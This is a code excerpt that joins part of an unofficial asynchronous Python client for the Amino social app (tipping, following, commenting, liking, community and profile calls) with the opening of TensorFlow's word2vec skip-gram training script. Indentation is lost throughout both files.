if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def send_coins(self, coins: int, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
url = None
if transactionId is None: transactionId = str(uuid4())
data = {
"coins": coins,
"tippingContext": {"transactionId": transactionId},
"timestamp": int(timestamp() * 1000)
}
if blogId is not None: url = f"{self.api}/g/s/blog/{blogId}/tipping"
if chatId is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/tipping"
if objectId is not None:
data["objectId"] = objectId
data["objectType"] = 2
url = f"{self.api}/g/s/tipping"
if url is None: raise exceptions.SpecifyType()
data = json.dumps(data)
async with self.session.post(url, headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
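# Tipping sketch (illustrative only; `client` and the IDs are placeholders). Exactly one
# target must be given, otherwise SpecifyType is raised:
#
#     await client.send_coins(10, blogId=someBlogId)     # tip a blog
#     await client.send_coins(10, chatId=someChatId)     # tip a chat
#     await client.send_coins(10, objectId=someObjectId) # tip another object (sent with objectType 2)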
async def follow(self, userId: Union[str, list]):
"""
Follow a User or Multiple Users.
**Parameters**
- **userId** : ID of the User or List of IDs of the Users.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str):
async with self.session.post(f"{self.api}/g/s/user-profile/{userId}/member", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif isinstance(userId, list):
data = json.dumps({"targetUidList": userId, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/joined", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else: raise exceptions.WrongType(type(userId))
async def unfollow(self, userId: str):
"""
Unfollow a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.delete(f"{self.api}/g/s/user-profile/{userId}/member/{self.userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def block(self, userId: str):
"""
Block a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.post(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def unblock(self, userId: str):
"""
Unblock a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.delete(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def join_community(self, comId: str, invitationCode: str = None):
"""
Join a Community.
**Parameters**
- **comId** : ID of the Community.
- **invitationCode** : Invitation Code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if invitationCode: data["invitationId"] = await self.link_identify(invitationCode)
data = json.dumps(data)
async with self.session.post(f"{self.api}/x{comId}/s/community/join", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def request_join_community(self, comId: str, message: str = None):
"""
Request to join a Community.
**Parameters**
- **comId** : ID of the Community.
- **message** : Message to be sent.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"message": message, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/x{comId}/s/community/membership-request", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def leave_community(self, comId: str):
"""
Leave a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.post(f"{self.api}/x{comId}/s/community/leave", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def flag_community(self, comId: str, reason: str, flagType: int, isGuest: bool = False):
"""
Flag a Community.
**Parameters**
- **comId** : ID of the Community.
- **reason** : Reason of the Flag.
- **flagType** : Type of Flag.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded()
if flagType is None: raise exceptions.FlagTypeNeeded()
data = json.dumps({
"objectId": comId,
"objectType": 16,
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
})
if isGuest: flg = "g-flag"
else: flg = "flag"
async with self.session.post(f"{self.api}/x{comId}/s/{flg}", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def edit_profile(self, nickname: str = None, content: str = None, icon: BinaryIO = None, backgroundColor: str = None, backgroundImage: str = None, defaultBubbleId: str = None):
"""
Edit account's Profile.
**Parameters**
- **nickname** : Nickname of the Profile.
- **content** : Biography of the Profile.
- **icon** : Icon of the Profile.
- **backgroundImage** : Url of the Background Picture of the Profile.
- **backgroundColor** : Hexadecimal Background Color of the Profile.
- **defaultBubbleId** : Chat bubble ID.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"address": None,
"latitude": 0,
"longitude": 0,
"mediaList": None,
"eventSource": "UserProfileView",
"timestamp": int(timestamp() * 1000)
}
if nickname: data["nickname"] = nickname
if icon: data["icon"] = await self.upload_media(icon, "image")
if content: data["content"] = content
if backgroundColor: data.setdefault("extensions", {}).setdefault("style", {})["backgroundColor"] = backgroundColor
if backgroundImage: data.setdefault("extensions", {}).setdefault("style", {})["backgroundMediaList"] = [[100, backgroundImage, None, None, None]]
if defaultBubbleId: data.setdefault("extensions", {})["defaultBubbleId"] = defaultBubbleId
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/user-profile/{self.userId}", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def set_privacy_status(self, isAnonymous: bool = False, getNotifications: bool = False):
"""
Edit account's Privacy Status.
**Parameters**
- **isAnonymous** : If visibility should be Anonymous or not.
- **getNotifications** : If account should get new Visitors Notifications.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
data["privacyMode"] = 2 if isAnonymous else 1
data["notificationStatus"] = 1 if getNotifications else 2
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/account/visit-settings", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def set_amino_id(self, aminoId: str):
"""
Edit account's Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"aminoId": aminoId, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/account/change-amino-id", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_linked_communities(self, userId: str):
"""
Get a List of Linked Communities of a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.CommunityList(json.loads(await response.text())["linkedCommunityList"]).CommunityList
async def get_unlinked_communities(self, userId: str):
"""
Get a List of Unlinked Communities of a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.CommunityList(json.loads(await response.text())["unlinkedCommunityList"]).CommunityList
async def reorder_linked_communities(self, comIds: list):
"""
Reorder List of Linked Communities.
**Parameters**
- **comIds** : IDS of the Communities.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"ndcIds": comIds, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/reorder", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def add_linked_community(self, comId: str):
"""
Add a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def remove_linked_community(self, comId: str):
"""
Remove a Linked Community from your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.delete(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def comment(self, message: str, userId: str = None, blogId: str = None, wikiId: str = None, replyTo: str = None):
"""
Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **message** : Message to be sent.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
- **replyTo** : ID of the Comment to Reply to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is None: raise exceptions.MessageNeeded()
data = {
"content": message,
"stickerId": None,
"type": 0,
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["respondTo"] = replyTo
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/user-profile/{userId}/g-comment", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/blog/{blogId}/g-comment", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/item/{wikiId}/g-comment", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else: raise exceptions.SpecifyType()
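# Usage sketch (illustrative only; `client` and the IDs are placeholders). Exactly one of
# userId/blogId/wikiId selects where the comment is posted:
#
#     await client.comment("Nice wall!", userId=someUserId)                  # on a user's wall
#     await client.comment("Great post!", blogId=someBlogId)                 # on a blog
#     await client.comment("Same here.", wikiId=someWikiId, replyTo=someCid) # reply on a wiki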
async def delete_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Delete a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: url = f"{self.api}/g/s/user-profile/{userId}/g-comment/{commentId}"
elif blogId: url = f"{self.api}/g/s/blog/{blogId}/g-comment/{commentId}"
elif wikiId: url = f"{self.api}/g/s/item/{wikiId}/g-comment/{commentId}"
else: raise exceptions.SpecifyType()
async with self.session.delete(url, headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def like_blog(self, blogId: Union[str, list] = None, wikiId: str = None):
"""
Like a Blog, Multiple Blogs or a Wiki.
**Parameters**
- **blogId** : ID of the Blog or List of IDs of the Blogs. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if blogId:
if isinstance(blogId, str):
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/blog/{blogId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif isinstance(blogId, list):
data["targetIdList"] = blogId
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/feed/g-vote", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else: raise exceptions.WrongType(type(blogId))
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/item/{wikiId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else: raise exceptions.SpecifyType()
async def unlike_blog(self, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Blog or Wiki.
**Parameters**
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if blogId: url = f"{self.api}/g/s/blog/{blogId}/g-vote?eventSource=UserProfileView"
elif wikiId: url = f"{self.api}/g/s/item/{wikiId}/g-vote?eventSource=PostDetailView"
else: raise exceptions.SpecifyType()
async with self.session.delete(url, headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def like_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Like a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else: raise exceptions.SpecifyType()
async def unlike_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: url = f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?eventSource=UserProfileView"
elif blogId: url = f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?eventSource=PostDetailView"
elif wikiId: url = f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?eventSource=PostDetailView"
else: raise exceptions.SpecifyType()
async with self.session.delete(url, headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_membership_info(self):
"""
Get Information about your Amino+ Membership.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Membership Object <amino.lib.util.objects.Membership>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/membership?force=true", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.Membership(json.loads(await response.text())).Membership
async def get_ta_announcements(self, language: str = "en", start: int = 0, size: int = 25):
"""
Get the list of Team Amino's Announcement Blogs.
**Parameters**
- **language** : Language of the Blogs.
- ``en``, ``es``, ``pt``, ``ar``, ``ru``, ``fr``, ``de``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Blogs List <amino.lib.util.objects.BlogList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if language not in await self.get_supported_languages(): raise exceptions.UnsupportedLanguage(language)
async with self.session.get(f"{self.api}/g/s/announcement?language={language}&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.BlogList(json.loads(await response.text())["blogList"]).BlogList
async def get_wallet_info(self):
"""
Get Information about the account's Wallet.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/wallet", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.WalletInfo(json.loads(await response.text())["wallet"]).WalletInfo
async def get_wallet_history(self, start: int = 0, size: int = 25):
"""
Get the Wallet's History Information.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/wallet/coin/history?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.WalletHistory(json.loads(await response.text())["coinHistoryList"]).WalletHistory
async def get_from_deviceid(self, deviceId: str):
"""
Get the User ID from a Device ID.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : :meth:`User ID <amino.lib.util.objects.UserProfile.userId>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/auid?deviceId={deviceId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["auid"]
async def get_from_code(self, code: str):
"""
Get the Object Information from the Amino URL Code.
**Parameters**
- **code** : Code from the Amino URL.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/link-resolution?q={code}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.FromCode(json.loads(await response.text())["linkInfoV2"]).FromCode
async def get_from_id(self, objectId: str, objectType: int, comId: str = None):
"""
Get the Object Information from the Object ID and Type.
**Parameters**
- **objectId** : ID of the Object. User ID, Blog ID, etc.
- **objectType** : Type of the Object.
- *comId* : ID of the Community. Use if the Object is in a Community.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"objectId": objectId,
"targetCode": 1,
"objectType": objectType,
"timestamp": int(timestamp() * 1000)
})
if comId: url = f"{self.api}/g/s-x{comId}/link-resolution"
else: url = f"{self.api}/g/s/link-resolution"
async with self.session.post(url, headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.FromCode(json.loads(await response.text())["linkInfoV2"]).FromCode
async def get_supported_languages(self):
"""
Get the List of Supported Languages by Amino.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`List of Supported Languages <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/community-collection/supported-languages?start=0&size=100", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["supportedLanguages"]
async def claim_new_user_coupon(self):
"""
Claim the New User Coupon available when a new account is created.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.post(f"{self.api}/g/s/coupon/new-user-coupon/claim", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_subscriptions(self, start: int = 0, size: int = 25):
"""
Get Information about the account's Subscriptions.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/store/subscription?objectType=122&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["storeSubscriptionItemList"]
async def get_all_users(self, start: int = 0, size: int = 25):
"""
Get a list of Users of Amino.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User Profile Count List Object <amino.lib.util.objects.UserProfileCountList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile?type=recent&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfileCountList(json.loads(await response.text())).UserProfileCountList
async def accept_host(self, chatId: str, requestId: str):
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/transfer-organizer/{requestId}/accept", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def accept_organizer(self, chatId: str, requestId: str):
return await self.accept_host(chatId, requestId)
# Contributed by 'https://github.com/LynxN1'
async def link_identify(self, code: str):
async with self.session.get(f"{self.api}/g/s/community/link-identify?q=http%3A%2F%2Faminoapps.com%2Finvite%2F{code}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())
async def invite_to_vc(self, chatId: str, userId: str):
"""
Invite a User to a Voice Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"uid": userId
})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/vvchat-presenter/invite", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def wallet_config(self, level: int):
"""
Change the Wallet's ads config.
**Parameters**
- **level** : Level of the ads.
- ``1``, ``2``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"adsLevel": level,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/wallet/ads/config", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_avatar_frames(self, start: int = 0, size: int = 25):
async with self.session.get(f"{self.api}/g/s/avatar-frame?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.AvatarFrameList(json.loads(await response.text())["avatarFrameList"]).AvatarFrameList
async def subscribe_amino_plus(self, transactionId="", sku="d940cf4a-6cf2-4737-9f3d-655234a92ea5"):
"""
Subscribe to Amino+.
**Parameters**
- **transactionId** : The transaction ID, as a uuid4 string.
- **sku** : SKU of the membership product.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"sku": sku,
"packageName": "com.narvii.amino.master",
"paymentType": 1,
"paymentContext": {
"transactionId": (transactionId or str(uuid4())),
"isAutoRenew": True
},
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/membership/product/subscribe", headers=self.parse_headers(), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
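# End-to-end sketch of driving the coroutines above with asyncio. The client class name and
# its constructor/login signature are not shown in this excerpt, so `make_client()` is a
# placeholder for however an authenticated instance with an open session is obtained:
#
#     import asyncio
#
#     async def demo():
#         client = await make_client()  # placeholder: build and log in a client instance
#         print(await client.get_supported_languages())
#         await client.visit(someUserId)
#
#     asyncio.run(demo())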
|
word2vec_optimized.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
(Mikolov et al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy('france', 'paris', 'russia') and "
"model.nearby(['proton', 'elephant', 'maxwell'])")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
